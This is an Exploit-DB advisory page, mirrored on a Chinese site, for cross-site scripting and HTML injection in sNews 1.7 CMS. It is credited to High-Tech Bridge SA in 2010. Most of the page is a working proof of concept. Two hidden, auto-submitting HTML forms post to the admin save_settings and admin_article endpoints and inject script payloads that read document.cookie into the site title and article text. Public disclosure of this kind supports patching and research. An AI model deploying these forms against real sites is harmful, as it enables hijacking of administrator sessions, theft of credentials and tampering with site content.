sNews 1.7 – ‘snews.php’ Cross-Site Scripting / HTML Injection - 体验盒子

作者： High-Tech Bridge SA
日期： 2010-10-19
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/34882/
source: https://www.securityfocus.com/bid/44255/info

sNews is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

sNews 1.7 is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/?action=process&task=save_settings" method="post" name="main" > <input type="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'> <input type="hidden" name="home_sef" value="home"> <input type="hidden" name="website_description" value="sNews CMS"> <input type="hidden" name="website_keywords" value="snews"> <input type="hidden" name="website_email" value="info@mydomain.com"> <input type="hidden" name="contact_subject" value="Contact Form"> <input type="hidden" name="language" value="EN"> <input type="hidden" name="charset" value="UTF-8"> <input type="hidden" name="date_format" value="d.m.Y.+H:i"> <input type="hidden" name="article_limit" value="3"> <input type="hidden" name="rss_limit" value="5"> <input type="hidden" name="display_page" value="0"> <input type="hidden" name="num_categories" value="on"> <input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html"> <input type="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf"> <input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png"> <input type="hidden" name="comment_repost_timer" value="20"> <input type="hidden" name="comments_order" value="ASC"> <input type="hidden" name="comment_limit" value="30"> <input type="hidden" name="word_filter_file" value=""> <input type="hidden" name="word_filter_change" value=""> <input type="hidden" name="save" value="Save"> </form> <script> document.main.submit(); </script> <form action="http://www.example.com/?action=process&task=admin_article&id=2" method="post" name="main" > <input type="hidden" name="title" value="article title" /> <input type="hidden" name="seftitle" value="sefurl" /> <input type="hidden" name="text" value='article text"><script>alert(document.cookie)</script>' /> <input type="hidden" name="define_category" value="1" /> <input type="hidden" name="publish_article" value="on" /> <input type="hidden" name="position" value="1" /> <input type="hidden" name="description_meta" value="desc" /> <input type="hidden" name="keywords_meta" value="key" /> <input type="hidden" name="display_title" value="on" /> <input type="hidden" name="display_info" value="on" /> <input type="hidden" name="fposting_day" value="29" /> <input type="hidden" name="fposting_month" value="9" /> <input type="hidden" name="fposting_year" value="2010" /> <input type="hidden" name="fposting_hour" value="16" /> <input type="hidden" name="fposting_minute" value="40" /> <input type="hidden" name="task" value="admin_article" /> <input type="hidden" name="edit_article" value="Edit" /> <input type="hidden" name="article_category" value="1" /> <input type="hidden" name="id" value="2" /> </form> <script> document.main.submit(); </script>